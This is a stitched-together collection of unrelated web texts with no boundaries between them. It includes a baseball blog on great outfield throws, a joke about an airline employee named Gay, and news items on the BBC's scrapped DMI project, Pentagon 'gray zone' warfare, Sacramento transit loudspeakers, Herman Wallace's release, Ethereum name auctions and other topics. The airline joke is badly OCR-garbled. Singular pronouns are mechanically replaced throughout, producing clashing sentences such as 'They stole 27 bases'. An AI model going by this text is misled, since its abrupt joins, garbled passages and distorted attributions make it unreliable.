This throw is somewhere between a frozen rope and a rainbow , with sick movement and deadly accuracy . Look at the catcher , they do n't even move an inch . Neither does the runner on third , Jordan Schafer . And it 's not like Schafer is some lumbering DH type who ca n't be expected to tag on a fly ball 350 feet to right centre . They stole 27 bases in 2012 , and has four 20-steal seasons on their resume . Here are two slo-mo angles of the throw .
This one shows their kinetic pitcher-like windup really well .
This one captures the incredible accuracy of the throw . The catcher 's feet do not move .
The obvious/painful irony here is that the guy could n't throw a strike from 60 feet but has no problem doing it from the outfield .
2 . Ichiro cuts down Terrence Long at third base
Estimated distance : 200 ft .
This is probably the most iconic throw on the fly ever . The distance is n't all that impressive , but it 's the straight and low trajectory of the ball that makes this one a classic . It 's the definition of a frozen rope ; you could hang laundry off that throw for a month .
The announcers guess it 's about “ six feet off the ground ” , and it 's actually so low that it almost did n't make this post because I could n't quite tell if it bounces before third baseman David Bell catches it .
1 . Jose Guillen pegs Neifi Perez at third from the warning track
Estimated distance : 360 ft .
This was the hardest distance to estimate , so for the sake of transparency I 'll show you my work . Statcast is spoiling our children and ruining future generations .
Using the known distance from the warning track to home plate at Coors ( 370 ft. ) and the known distance from home plate to third ( 90 ft. ) , I did a little Pythagorean Theorem to roughly calculate the distance of the throw . Obviously this is n't a precise right-angle triangle but 360 ft. seems about right .
This throw gets my vote because it has everything : comedy , redemption , power , accuracy , awe . Guillen waits at the wall for a full second and looks like they have their leap timed perfectly before the ball suddenly hits them square on the head/shoulder and dribbles onto the warning track . They pick it up , takes one mighty crow hop , and uncorks a throw that defies classification . It 's arcing and at the same time flat . It 's warping the space and time 15-20 feet above the field . And then it hits the third basemen at the letters with plenty of time to spare . ( The announcers guess they were out by “ about five or six feet . ” )
It 's worth noting that the runner , Neifi Perez , was coming from first base and probably had to hold up around second to make sure Guillen did n't make the catch . It 's also worth noting that Perez led the NL in triples ( 11 ) the very next season and stole 13 bases .
I 'm guessing this throw had some help from the thin Coors air , because it does n't look realistic . The title of the official MLB highlight is “ Jose Guillen 's mutant throw from the warning track. ” When you see this play , the natural reaction is to search for some exogenous because that could possibly explain how this happened .
Honestly , how is this throw real ?
That 's it for this week of Who Did It Best ? Comment if you think I missed a better throw than these four , and make sure to cast your vote for your favourite throw on the fly !
BONUS HIGHLIGHT : Bautista completes a 9-3 putout of Billy Butler
😂😂😂😂😂😂
Advertisements
It has been reported that an
employee for Insert Australia
Airlines ) , who happened to have the last name of Gay , got
on a plane recently using the company ' s Tree Flight ' offer
for staff . However . when Mr Gay tried to take their seat . they
found it being occupied by a fare paying passenger .
so , not to make a fuss , they simply chose another seat Unknown to Mr Gay ,
another rinsed flight at the airport experienced mechanical problems , The
passengers of this flight were being regrouped to various other airplanes .
A few were put on Mr Gay ' s flight and anyone who was holding a 'free '
was being 'bumped'. , Anson officials , armed with a list of these
ticket holders boarded the plane , as is the practise , to remote
in favour of fare paying passengers . Of course , our Mr Gay was not
sitting in their assigned seat as you may remember , so when the Ticket Agent
approached the seat where Mr Gay was supposed to be sitting , they asked a
startled customer `` Are you gay ? '' The man , shyly nodded that they are , at
which point they demanded : `` Then you have to get off the plane , ``
Mr Gay , overheating what the Agent had said , tried to clear up the
situation : `` ‘ `` `` yae got the wrong man . Fm Gaye '' This caused an angry
third passenger to yell `` Herd Fro gay tool They tan ' t kick us all off ? * ''
Confusion reined as more and more passengers began yelling that Insert
had no right to remove gays from their flights - .... . -1. ; ...
it is reported that Insert has refused to comment on the incident .
...
In one of their characteristic 180-degree turns , the Coen brothers appear to be planning to follow up their successful western True Grit with a film about the New York coffeehouse folk scene of the 1950s and 60s . After reports last month that the Coens were planning a `` music-based movie '' , the LA Times now suggests that the subject will be focused on the radical folk scene that nurtured Bob Dylan , Joan Baez and Joni Mitchell – and specifically on the cult figure of Dave Van Ronk .
Van Ronk , who died in 2002 , was a key figure in the Greenwich Village folk scene , helping to revive traditional and blues music in the late 50s , and remaining involved in radical politics all their life . Their memoirs , The Mayor of MacDougal Street , were published in 2005 .
The Coens have previously focused on traditional Americana and roots music , notably with their 2000 film O Brother Where Art Thou ? which helped to trigger a major bluegrass revival , after the release of its bestselling soundtrack album produced by T-Bone Burnett .
THE larger the IT project , the greater the potential for pratfalls . The lesson is learned painfully by many managers , though not often as publicly as the BBC , which now admits that a failed project to create an ambitious digital content management system , entitled the Digitial Media Initiative ( DMI ) had to be scrapped after costing £98.4 million ( $ 152 million . ) The loss of so much licence-fee money on a single miscalculated scheme has implications extending well beyond the current embarrassment of the BBC 's governing Trust and the broadcaster 's managers .
In comparison to , say , the crisis unleashed by allegations of decades of sexual abuse by the late Jimmy Savile , once a prominent star in TV schedules , the DMI story has felt rather like a slow-burning crisis . So slow in fact , that insiders referred to the doomed project with the wry acronym Do n't Mention It . Now the digging into what went wrong begins , as the National Audit Office , which monitors public expenditure and the Commons Public Accounts Committee , start their hearings into the matter .
Get our daily newsletter Upgrade your inbox and get our Daily Dispatch and Editor 's Picks .
IT projects gone awry because they were conceived on too massive a scale , and good money thrown after bad , are financial nuisances far from unique to the Beeb . The NHS has suffered a series of even more costly debacles . Not for the first time recently , however , the structures of the broadcaster 's management and governance have looked dicey . One problem appears to be that neither existing bosses nor the BBC Trust seem to have possessed the knowledge or initiative to act earlier , despite several whistle-blower warnings and admissions that senior managers had felt worried about the undertaking .
Fortunately for Lord ( Tony ) Hall , the new director general and their team , their role has been to pull the plug quickly , declare that mistakes have been made ( echoes of the Soviet communist party dealing with the legacies of recently departed leaders spring to your blogger 's mind ) . Neither Lord Hall nor James Purnell , their strategy chief overseeing the bid for the BBC 's charter renewal in 2017 , were around at the time . They argue that many other technological innovations , such as the multi-platform viewing of the Olympics and the iPlayer , the BBC 's on-demand service , have gone pretty well . Lessons will no doubt be said to have been learnt .
However the BBC Trust , chaired by the avuncular Lord Patten , still has a serious case to answer . Recast in 2007 to give it greater autonomy , the organisation which represents the interest of licence-fee payers has looked slow-footed . The Trust is mainly constituted around the idea of regional representation , and the lack of oversight will surely raise questions about whether it can garner enough expertise in this form to prevent the same sort of problem recurring . Were it to be the non-exec board of a private company , the answer would certainly be that it has so far failed to do that . Largely symbolic oversight is very different from having rigorous , questioning people to ask precisely what is going on when grand undertakings go wrong and excuses run out .
That challenge is on the mind of ministers , toying with the notion of handing over BBC governance to Ofcom , the main media regulator . It will also be on the minds of politicians , as the BBC begins its bid for renewed funding in the new licence-fee settlement from 2017 . The path looks rockier than it did .
The American military must become better at operating in a “ gray zone ” of war , one that sometimes calls for using “ deception , infiltration , and persistent denial , ” the Pentagon 's No . 2 official said in a little-noticed speech this week .
These are the sort of tactics that Russia has been using in Crimea and Ukraine , Deputy Defense Secretary Bob Work noted Wednesday in remarks at a strategy conference at the United States Army War College in Carlisle , Pa .
America 's adversaries today use “ agents , paramilitaries , deception , infiltration , and persistent denial – staying within that so-called ‘ gray zone , ' ” they told assembled officers . “ That 's a zone in which we do n't typically operate , but one in which we must become more proficient . ”
Is America 's second most senior civilian in the Pentagon suggesting that the country should … play dirty ? Is Russia really a model for what the kind of military action the United States wants to take ?
Perhaps not , say several military analysts . Rather , their comments point to the evolving nature of war and America 's need to change with it .
For the foreseeable future , America 's wars will be fought in the gray zone , and it should seek to be as good in this realm as it is in conventional warfare . That means knowing how to use militias as deftly as Russia and Iran do , how to use social media propaganda as effectively as the Islamic State , as well as how to cope with improvised explosive devices and cyberattacks .
“ The whole concept of 'asymmetric ' warfare just means that someone is not being stupid , ” says Paul Scharre , a fellow at the Center for a New American Security . “ Why should you assume that our enemies wo n't be smart ? ”
In their remarks at the War College , Work outlined the ways in which they believe this warfare is advancing , from asymmetric attacks to a blend of low and high-tech tactics known as hybrid warfare .
“ If the streets of Baghdad and the valleys of Afghanistan were a laboratory of irregular war , I believe that what we will increasingly see in the future is hybrid wars , ” they said .
The US caught a particular glimpse of this in the 2006 Lebanon War , when the Israeli Defense Forces ( IDF ) battled Hezbollah .
“ Hezbollah had gone to school on the IDF , transforming from a guerrilla force to a formidable quasi-conventional fighting force that was able to fight the IDF to a standstill . ”
The “ next level up , ” says Work , is what the US military has observed in Crimea and Ukraine . “ In both places , the Russians have unleashed what their chief of the general staff called ‘ non-linear warfare . ' ”
It resembles “ Hezbollah on steroids ” and in it , Work added , “ I really believe we 're seeing a laboratory of future 21st century land warfare . ”
The battles in Crimea and Ukraine , for example , have included everything from “ covert action by special operations forces to sustain unconventional warfare waged under an umbrella of denial , then ultimately escalating to force-on-force proxy combat , ” they said .
“ It 's when this type of conflict moves from the shadowy actions of ‘ fifth columns ' and ‘ little green men ' to force-on-force conflict that it will prove the most challenging . ”
Is Work advocating that the US military respond in kind ? Mr. Scharre does n't see it this way .
“ Just because Russia 's doing something , that does n't mean we want to do the same thing they 're doing . ”
But the Pentagon needs “ to be aware of those things , and not treat them as unimportant . ”
And while the US may not necessarily need to respond in kind , it will want to respond .
This might include , for example , strengthening the US military 's ability to respond to proxies and hardening the systems of the US and its allies against cyberattacks , says Scharre , who served as a Special Operations reconnaissance team leader in Iraq and Afghanistan , and later worked in the Office of the Secretary of Defense from 2008 to 2013 helping to develop emerging weapons technologies .
“ I do n't see anything alarming in the speech – it 's more a call to open our eyes to what 's happening , ” they add . “ We need to be more flexible . ”
This flexibility might mean using proxies , says Andrew Krepinevich , president of the Center for Strategic and Budgetary Assessments . The US military has done it before , and may need to do it again , they add .
Just as US adversaries including Iran “ are using Hezbollah and the Mahdi Army , we may have to look for opportunities , especially if we want to keep a small footprint , ” says Dr. Krepinevich , who served in the Army for 21 years and also worked in the Office of Net Assessment , the Pentagon 's internal think tank .
The US military can enable resistance groups to wage hybrid warfare against its own enemies , too , they add . One of the trickiest dangers in this , however , is empowering the wrong people .
“ There 's a presumption that your interests are the same as those you 're supporting. ” Yet less than four years after US forces left Vietnam , China was invading . “ Their [ North Vietnamese ] clients that were waging war against us became adversaries . ”
And of course some of the Mujahideen fighters that the Pentagon supported during the Soviet War in Afghanistan went on to form the seeds for Al Qaeda .
“ Even though you may have a common interest in defeating a common enemy , you have to realize that you and the group you 're sponsoring and giving the capabilities to wage hybrid warfare may have common interests that are enduring once that particular obstacle is removed , ” Krepinevich says .
“ Once the Soviets left Afghanistan , we and the Mujahideen turned out to have very different long-term interests . ”
In these situations , it is helpful to provide resources to proxies that “ can be turned off ” once the conflict is over .
Get the Monitor Stories you care about delivered to your inbox . By signing up , you agree to our Privacy Policy
The shoulder-fired stinger anti-aircraft missiles “ is a capability you can turn off fairly quickly ” since once the missiles are gone , the launcher is useless , Krepinevich says .
On the other hand , tanks and combat aircraft can last a lot longer . “ The Iranians were still flying F-14s long after the Shah had been deposed . ”
Teams hoping the Boston Red Sox might be willing to part with left-hander Jon Lester are advised to look elsewhere .
Despite their disappointing performance , the Red Sox will not trade Lester , a major league source said Wednesday , further reinforcing the team 's decision to push for a playoff spot in 2012 .
The Red Sox remain engaged on a number of fronts to add starting pitching , most notably with the Miami Marlins for right-hander Josh Johnson and the Chicago Cubs for right-hander Matt Garza .
But Boston will face stiff competition from a number of contenders . With the Marlins already having traded another front-line pitcher , Anibal Sanchez , to the Detroit Tigers , another major league source said it was unlikely Miami also would move Johnson `` unless another team goes crazy . ''
`` It makes you feel good that you 're wanted , '' Lester said before Wednesday night 's game at Arlington , Texas . `` That 's kind of the whole point of trade inquires is the fact that other teams want you . It 's nice , but it 's nice to be here and nice to be wanted here .
`` I 'm sure it 's something that goes on every year ; it 's just a little more publicized this year because of obviously not very good numbers and some other nonsense that was let out , or said earlier this year about being unhappy and all that other stuff .
`` When it comes down to the fact of being wanted , it 's a good feeling . That 's what everybody wants in life and in your job . It gives you that extra confidence that even though I 'm not doing what I normally do , people still see the good and want what I 've done in the past . ''
`` I 'm sure a lot of teams want him , '' Red Sox pitcher John Lackey said . `` It does n't surprise me at all . There are a lot of teams that would want a guy like that . This is the first time he 's ever struggled . It 's not that big of a deal to stick behind a guy who 's done what he 's done . I think it 's a no-brainer . ''
Meanwhile , several clubs have approached the Red Sox about their surplus of outfielders . The Cincinnati Reds and Pittsburgh Pirates both have scouted the Red Sox extensively . Ryan Kalish , Ryan Sweeney and Cody Ross all have attracted varying degrees of interest .
The Red Sox are at .500 with a 49-49 record , four games behind in the wild-card race . In order to win 90 games , the Red Sox would have to go 41-23 the rest of the way , a .641 percentage . Since 1996 , 90 wins would not have been sufficient to qualify for the playoffs ; the 2000 Mariners and 2011 Rays both qualified with 91 wins , the fewest since the wild-card Orioles won 88 in 1996 .
The extra wild card this season changes things a bit , of course . Since 1996 ( the start of the wild card era ) , the team with the fifth-best record in each league ( the equivalent of that second wild-card spot ) has averaged 89 wins .
What is the likelihood of the Red Sox playing at a 90-win pace ? In the past six seasons , only five teams have played at .641 or better over the season 's last 64 games , no more than one in any season . In the National League , only four teams have played at .641 or better , none from 2007-2009 .
Over the past 10 seasons , the Red Sox have done so twice -- in 2004 , when they went 44-20 ( .688 ) to claim a wild-card spot , and in 2005 , when they went 41-23 ( .641 ) to claim another wild-card spot .
There are seven teams ahead of the Red Sox in the wild-card race and another , the Blue Jays , tied with them . The two teams in the lead , the Angels and Athletics , would have to play .600 ball the rest of the way to finish with 91 wins .
ESPNBoston.com reporter Joe McDonald contributed to this report from Arlington , Texas .
Sacramento Regional Transit has begun scolding scofflaws via loudspeaker at light rail stations , and officials say the practice is causing loiterers to leave and others to straighten up their behavior .
The new “ Voice of God ” approach to security , which came online last month , is unusual and possibly unique among transit agencies . Security officers at an operations center downtown monitor live video feeds from light rail cameras and use new public address systems at stations to call out people who loiter , smoke , drink alcohol , fight or otherwise break the rules .
The effect , as seen in several videos released by the agency , is at times comical . The announcements sometimes startle the person being addressed , causing them to jerk their heads up and around to see where the voice is coming from .
SacRT security chief Lisa Hinz , a Sacramento Police Department lieutenant , said most people are complying with the instructions they receive from afar . “ I 'm pleasantly surprised , ” they said . “ We 're immediately able to stop bad behavior . ”
Sign Up and Save Get six months of free digital access to The Sacramento Bee
Hinz said the agency 's policy is to address the person respectfully . A typical approach : Sir in the red shirt , please be advised , smoking is not allowed in light rail stations .
The loudspeaker communication is one way . If the person does not comply , the operations center worker will advise that person that an officer or transit agent is being dispatched to the station . Violators of SacRT ordinances can be issued a citation .
In one video released by SacRT , a man is sitting against a wall smoking at a downtown station . They suddenly look skyward , then right and left . When they see the overhead camera , they wave in acknowledgment , takes a last hurried drag on their cigarette , puts it out , waves to the camera again , then gets up and leaves the station .
In another video at the Royal Oaks station , a man is sitting on a low wall with what looks to be a bottle of alcohol next to him . They glance up once , then twice , a surprised look on their face . Then they grab the bottle , tosses it quickly into a dirt planter area behind the wall and walks away .
“ Unfortunately , the way that they dispose of the bottle is not ideal , but they do stop drinking , ” Hinz said .
Video cameras with the ability to pan , tilt and Zoom have been in place at all 52 stations since last year . The loudspeakers are in operation in about 30 stations and should be installed in all stations by this fall , Hinz said .
The agency typically employs guards in person at stations to manage behavior . But not all stations are patrolled in person , and stations are not patrolled all the time , Hinz said . The agency last year opened a joint operations center with city police on Richards Boulevard to fill in the gaps . Workers are now there on duty all hours during the week , Hinz said .
Operations center supervisor Vitaliy Yakimchuk said dispatchers watch camera feeds on a rotating basis , jumping from station to station , but focus more on stations that are busy or that have more problems .
SacRT 's PA system use appears to be unusual for a transit district . Local officials say they believe it is cutting edge .
Portland , San Diego and San Jose , which have light rail systems with open stations similar to Sacramento 's , report that they do not use public address systems to enforce rules . A spokesperson for BART , the Bay Area-wide commuter rail system , said station agents in booths monitor platform activity via live cameras and use loudspeakers to warn people to step away from the yellow safety strip area as trains approach the platform . But , they said , the agents do not use the system to enforce behavior rules .
The use of cameras and other new technology by law enforcement has come under scrutiny by some privacy advocates and civil liberties activists who say they fear government can use that technology to target individuals for monitoring . They also warn that abuse can occur when law enforcement agencies employ technology without adequate public input , and controls , up front .
When contacted by The Bee , however , representatives of the American Civil Liberties Union and the Electronic Frontier Foundation , a privacy advocacy group , said they have n't formed an opinion of SacRT 's use of loudspeakers and surveillance cameras .
A bill currently in the Legislature would require police agencies , including SacRT , to draw up a surveillance policy by July 2018 and have that policy approved during a public hearing by the agency 's board of elected officials .
Under that bill , SB 21 by Sen. Jerry Hill , D-San Mateo , any new surveillance technology considered for use after that date also would have to have local board approval before being put to use .
The goal , Hill has said , is to make sure the public has a say on how law enforcement uses cameras and recorders .
SacRT security chief Hinz said they believe transit riders , especially women , will feel safer as a result of the public address system . “ You know that there are people watching and monitoring behavior , and can dispatch a police officer . ”
Light rail rider Elizabeth Stevenson , a downtown state worker , said this week they like the idea , although they have n't seen it in use yet . A year ago , an angry male stranger at a station began yelling at her , causing them to fear for their safety . “ It does make me feel better ” to know someone may be watching , and could speak to the man and dispatch police units , they said .
Lynnette Green , a state worker and rider , said they want to see SacRT do more about people who cause a “ ruckus ” on trains , which have cameras but are not yet monitored in real time . They agreed with Stevenson that the PA use may encourage more people to ride because they will feel safer .
“ Big Brother is watching , ” they said . “ In a good way . ”
US shelves transfer of frigates to Turkey
WASHINGTON
The Oliver Hazard Perry-class frigate USS Halyburton
The United States has shelved the handover of two leftover frigates to Turkey , as Congress excluded Turkey from a bill seeking permission to transfer vessels to foreign countries , citing Mediterranean tensions.The U.S. approved the “ Naval Transfer Act ” bill in late December , approving the transfer of six naval frigates to Mexico and Taiwan , but eliminated Turkey over political concerns.In the 2012 version of the “ Naval Transfer Act , ” Turkey was to receive two Oliver Hazard Perry class guided missile frigates , the USS Halyburton and the USS Thach , which are being decommissioned by the U.S. Navy.However , some members of Congress objected to the transfer of naval frigates to Turkey , mainly citing the county 's strained relations with Israel and Greek Cyprus in the Mediterranean. “ I believe we should hold off on sending powerful warships to Turkey and encourage the government in Ankara to take a less belligerent approach to their neighbors , ” Congressman Eliot Engel reportedly said during that debate.Congress members particularly emphasized Turkey 's tension with Greek Cyprus over energy sources off the divided island and its threats against natural gas exploration by American companies in the region. “ Turkey has recently threatened legitimate [ Greek ] Cypriot and Israeli efforts to cooperation on energy exploration . Ankara has boosted Turkish armed naval presence around the natural gas fields between Israel and Cyprus and declared invalid an agreement between Cyprus and Israel on demarcating their respective energy exploration areas , ” another member of congress , Brad Sherman , has been quoted as saying.Turkey is one of around a dozen countries that can manufacture its own warships thanks to its national warship program called Milgem.Two corvettes designed and built by the local manufacturers , Heybeliada and Büyükada , have been completed in 2008 and 2011 . The completed ships have been handed to the Navy , but annulment of the contract with the manufacturer company has slowed down the program .
The Olympic Games in Rio de Janeiro is coming to an end today but there are still plenty of medals to be won across a variety of events , including the men 's basketball . Basketball is one of the most prevalent sports in the world of LEGO and an impressive range of sets was released between 2003 and 2004 . The subtheme is famed for introducing flesh elements to reflect the skin colours of NBA players but also offered unusual play features and some new elements which are still in use today .
Furthermore , the Basketball range includes two minifigures which represent players who have been in action at the 2016 Olympic Games . Discover their identities after the break ...
The theme is divided between sets which feature real NBA players and those which include generic minifigures . Some sets included a single player and a ball while others offer entire stadia filled with full teams . 3433 The Ultimate NBA Arena is the largest set in the range and perfectly exhibits the function around which the range is built .
Each minifigure includes springs in its legs and has unusually shaped arms which allow them to pick up the basketball . Pulling back the minifigure and releasing it will shoot the ball towards the net and this works remarkably well as it is possible to adjust the angle and power of the shot to improve your accuracy .
Only two of the 24 players who appeared as minifigures are participating in the Olympic Games : Pau Gasol and Tony Parker . Gasol appears in two sets from 2003 and is competing as part of the Spanish team for the bronze medal today . They are currently the leading scorer in that match while Parker made it to the quarter-final with France and also featured in two sets .
The German football team is in attendance and won the silver medal on Saturday but none of the sixteen DFB Collectable Minifigures are playing at the Olympic Games , leaving Pau Gasol and Tony Parker as the only current Olympic athletes who have appeared as minifigures !
This is our final LEGO Sports article for the time being but we have lots more to come including a review of 71040 Disney Castle and What 's Missing ? Return of the Jedi which will be published next week .
Story highlights Inmate is released , according to attorney
Federal judge orders release of terminally ill inmate , 71
Herman Wallace was in solitary confinement for more than 40 years
They were convicted of killing a guard at prison in Angola , Louisiana
After more than 40 years of having their claims of an unjust murder conviction go unanswered , Louisiana inmate Herman Wallace is now a free man .
But it may be a Pyrrhic victory .
Wallace , who spent decades in solitary confinement , is terminally ill with liver cancer .
They were released after a judge vacated their murder conviction and sentence , one of their attorneys told CNN .
State officials had been threatened with contempt if they did not release Wallace immediately .
Wallace , 71 , is one of the `` Angola 3 '' -- three inmates who claim they tried to point out injustices at Louisiana State Penitentiary at Angola during the late 1960s and 1970s .
Wallace 's sisters , nieces and nephews wanted them moved to hospice care in New Orleans , said one of their attorneys .
`` He has claimed there was an unfair trial for 41 years and finally we have that ruling , '' attorney Nick Trenticosta told CNN on Tuesday night . `` For them to pass on from this world with friends and family at their side is extremely important . ''
U.S. District Chief Judge Brian A. Jackson in Baton Rouge The release came hours afterU.S . District Chief Judge Brian A. Jackson in Baton Rouge said that women were systematically excluded from the grand jury that indicted Wallace in the 1972 slaying of a guard at Louisiana State Penitentiary .
Jackson declined to address Wallace 's other claims , including an allegation that the state knowingly used false testimony and withheld exculpatory evidence at trial .
East Baton Rouge District Attorney Hillar Moore 's office subsequently filed an appeal with the Fifth Circuit U.S. Court of Appeals and asked that Wallace not be immediately released .
But , in a strongly worded order , Jackson later Tuesday repeated their demand that Wallace be freed immediately , saying the state has failed to show Wallace would be a flight risk or public danger if released . They threatened them with a contempt judgment .
The judge ruled that prosecutors have 30 days to notify Wallace whether they intend to seek a new indictment in the case .
Wallace 's legal team lauded the release of their client .
`` Tonight , Herman Wallace has left the walls of Louisiana prisons and will be able to receive the medical care that their advanced liver cancer requires , '' they said in a statement . `` It took the order of a federal judge to address the clear constitutional violations present in Mr. Wallace 's 1974 trial and grant them relief . The state of Louisiana has had many opportunities to address this injustice and has repeatedly and utterly failed to do so . ''
Prison a `` cauldron of brutality ''
Louisiana State Penitentiary is known as Angola after the land that it is on . The land used to be a plantation that the owners named after the home country of many of the slaves who worked there . The land was eventually bought by the prison system .
There is a museum for the prison , which became known as the `` bloodiest prison in the South '' because of the number of inmate assaults .
Official histories of Angola mention the abuses it was known for , but considers them a thing of the past .
However , as recently as this year , two death row inmates at Angola testified in court about being subjected to `` indescribable '' heat where they were held . The testimony was part of a lawsuit against the prison alleging that authorities placed inmates with pre-existing medical conditions at risk , the New Orleans Times Picayune reported .
Citing the case of the `` Angola 3 , '' several U.S. members of congress filed a complaint , alleging that inmates are kept in solitary confinement for unreasonable stretches of time .
Wallace was in solitary confinement at Angola until 2009 , when they were moved to Hunt Correctional Center . They remained in solitary until their diagnosis , according to Trenticosta .
Trenticosta said Wallace and another inmate at the Angola prison tried `` to stop the guard brutality as much as the inmate brutality . ''
Inmates often were in control of the Angola prison and young men were taken in as sexual slaves by fellow inmates , Trenticosta added . `` It was a cauldron of brutality . ''
Albert Woodfox and Wallace were convicted in the 1972 killing of Angola guard Brent Miller ; a third inmate , Robert King , also known as Robert K. Wilkerson , also protested prison conditions . Together , they were known as the `` Angola 3 . ''
Woodfox and Wallace claimed they were targeted because of their activism as Black Panthers .
Wallace , who was serving an armed robbery sentence at the time of Miller 's death , and Woodfox `` were threatening the status quo , '' Trenticosta said .
King was transferred to Angola just weeks after the guard was killed . Even so , they were investigated as a possible `` conspirator '' and put into solitary confinement alongside Wallace and Woodfox , according to the documentary `` In the Land of the Free . '' They were never convicted in connection with Miller 's death .
King was convicted in 1973 of killing a fellow inmate . Their conviction was overturned in 2001 , and they were freed .
Diagnosed with cancer this summer
Wallace proclaimed their innocence in Miller 's death in appeals .
`` Mr. Wallace has fought their unconstitutional conviction for decades and is supported by four alibi witnesses who place them in another part of the prison when the tragic murder occurred , '' their lawyers said Tuesday .
According to their lawyers , Wallace -- after losing between 40 and 50 pounds -- was found this summer to have terminal liver cancer .
Chemotherapy treatment has not been effective and was suspended , according to Trenticosta , one of the attorneys for Wallace and Woodfox . They said the cancer should have been treated much earlier .
Wallace and Woodfox , who remains in prison with appeals pending in their case , `` endured very restrictive conditions , including periods of 23-hour cell confinement , '' according to Amnesty International USA .
`` Tragically , this step toward justice has come as Herman is dying from cancer with only days or hours left to live . No ruling can erase the cruel , inhuman and degrading prison conditions they endured for more than 41 years , '' Amnesty said .
The human rights organization said it knows of only one other person in the United States who has been held for longer under such conditions .
The American Civil Liberties Union of Louisiana , asked authorities not to appeal the ruling that freed Wallace .
`` We hope that they will see reason instead , and allow Herman Wallace the chance to spend their final days outside of the confinement they have endured for more than 40 years , '' the group said in a statement .
Trenticosta said they last saw Wallace a few weeks ago .
`` There is no anger with Mr. Wallace , '' the lawyer said . `` He is the strongest person I have had the great opportunity to represent . They are about positive thinking . ''
In Warsaw , just about every city dweller will be able to afford to take a brand-new BMW to work . It 's not some high-end car sharing service – it 's the brand new Siemens Metro Inspiro train , penned by BMW DesignworksUSA .
The Polish capital announced that they 've inked a $ 375 million deal with Siemens to provide Inspiro light-rail trains to replace aging cars on the Warsaw Metro 's Line 1 . The cars will also serve as the primary trainset for Line 2 , which is currently under construction and expected to be completed by 2014
Just because BMW DesignworksUSA is a subsidiary of the BMW Group does n't mean Metro riders should expect the acceleration of an M3 in-between stops . However , it does mean that the Inspiro trains will feature extremely forward-thinking design cues . For instance , the train 's unique front end looks like a face , which is intended to be a `` trust-building '' feature for passengers . The train 's doors feature lights that let passengers know how much time they have left before the doors close , which the designers hope will put an end to the rugby scrum that takes place whenever train doors open anywhere in the world .
Those fancy doors open into the modernest palace , a first-class airport lounge just awaiting the Sharpies and keys of bored teenagers . The seats are made of birch and the floor is made of cork , which means the trains are 97.5 percent recyclable , and not just as artificial reefs .
Our favorite interior feature is a handrail we 'd actually want to hold on to . Called `` light trees , '' each metal pole flowers into multiple branches for multiple riders ' hands . The trees also feature ambient lighting that corrects the color balance of the interior depending on the time of day , even when the trains are underground . We 're pretty sure that the lights on Inspiros running in Manhattan would be set to `` dingy yellow '' 24/7 .
BMW is n't the only famed automotive designer to participate in public transportation . Trams in Athens , railcars in Zurich and trolleys on Boston 's Green Line all have bodies by Pininfarina , and for the Warsaw contract the Inspiro narrowly beat out an offering from Skoda .
Photos : BMW
The Ethereum Name Service ( ENS ) has now attracted more than $ 50 million worth of bids for a total of around 30,000 bids , auctioning for one of the nearly 70,000 eth names that have become available .
Names such as linkedin.eth , which went for “ only ” $ 230,000 worth of eth . While wallets.eth and payment.eth went for more than $ 1 million , perhaps because they may have a clear business model because of subnames .
That is , they can sell you your own subspace , such as trustnodes.wallets.eth , for $ 5 or whatever , and then your friends can send you money at this address rather than to those super long and complicated random strings of numbers and letters made for machines .
According to CodeTract , some prominent names currently being auctioned are elonmusk.eth ( although we may have to wait another two years for tesla.eth ) as well as names like blackjack.eth ( more than a million dollars have bid for that ) and contracts.eth ( “ only ” hundreds of thousands for this one ) .
The current highest bid is for a pretty incredible $ 17.7 million worth of eth . We do n't really know what name they are bidding for yet , but if more than seven letters are attracting this sort of numbers we ca n't quite imagine what bids three letter names like – you know the one – will attract .
Before this , the highest bid was for around $ 2 million , securing freemarket.eth . Good to see that spirit still lives on , although it 's not hard to see some obvious business use cases for that name , such as an eBay like smart contract which you pay by sending funds to freemarket.eth .
As long as they keep their eth locked in the freemarket.eth name that is , because they can release the eth and the name at any time after a year . So people ( and maybe machines ) are not actually paying for these names in the common use of that term .
Instead , they are automatically given the name by an eth smart contract based on who is willing to put the highest amount of eth as reserve . Then , that highest bid itself is not the amount locked , but that of the second highest bid . A sum of 0.5 % of that second highest bid is burned .
The overall effect is that around 500,000 eths has now been taken out of the market , reducing available supply , at least for one year , a sum which coincidentally amounts to 0.5 % of all eth .
For now , because the ethereum name service is growing very fast . It just launched around two weeks ago and now it stores more than $ 50 million with bids in the millions becoming somewhat common .
That suggests the market trusts it to be secure , or , far more likely , they are taking a calculated risk to reserve limited names which may become assets in and of themselves .
As for who is taking these risks no one knows . It may be just rich squatters , or perhaps it was actually Linkedin . Maybe they 're thinking CVs on smart contracts which somehow connect employers and employees making automatic payments in a freelance ecosystem .
We can hear some shouting petshops.com , but they thought amazon was a stupid idea too because no one is going to buy books online . And who on earth thought selling your granny made socks on e-Bay was ever such a good idea ?
Well , many did . That 's why there was that crazy dotcom boom . A boom which might be repeating itself with eth names going for nearly $ 20 million , ICOs at $ 1 billion and the total digital currencies market cap now hitting $ 60 billion .
As Pennsylvania prepares to award its first licenses for the fledgling medical marijuana industry , Lehigh University intends to partner with one of the potential growers in the Lehigh Valley to study the effect of the drug on children with autism .
While some parents of autistic children have preached the benefits of cannabis for years , Lehigh 's Dean of Education Gary Sasso confirmed Monday that the university wants to collect some of the first quantitative data on the controversial drug therapy . Pennsylvania is one of the few states that specifically allows children with autism to be treated with cannabis .
They said the anecdotal evidence is interesting , because marijuana appears to lack the side effects of the psychotropic drugs that are accepted in the treatment of autism . But , they cautioned , the effect of marijuana is largely unknown , underscoring the need for the study .
If it proves to be safe , `` does it mitigate some of the major characteristics of autism — social reluctance , language [ challenges ] and other stereotypical behaviors they sometimes engage in ? '' they said . `` We have that kind of expertise to do that . ''
Lehigh has been working with autistic children for years under its Center for Promoting Research to Practice and has organized annual workshops and other symposiums on the topic . Its professors conduct research and work with children at the Centennial School , a Lehigh-governed facility that serves children with autism and behavioral challenges .
Sasso said Lehigh would be working with BioGreen Farms , which is competing for a license to grow marijuana in Williams Township . BioGreen , which includes local developer Lou Pektor , has as a medical director Dr. Sue Sisley , who has agreements with other applicants for studies .
Sisley is a member of the steering committee at Thomas Jefferson University 's Lambert Center for the Study of Medicinal Cannabis and Hemp .
They were part of a research team last year awarded a Drug Enforcement Administration license to study marijuana 's effects on veterans and post-traumatic stress disorder . And they have gained national attention for their criticism of the quality of federally grown cannabis .
Sisley said they are eager to be able to conduct observational studies in Pennsylvania on lab-tested cannabis and autism .
`` Moms are certainly using this actively in the black market , and now it 's time to bring everything out and into the open , '' they said . `` It 's time to let sun shine in . ''
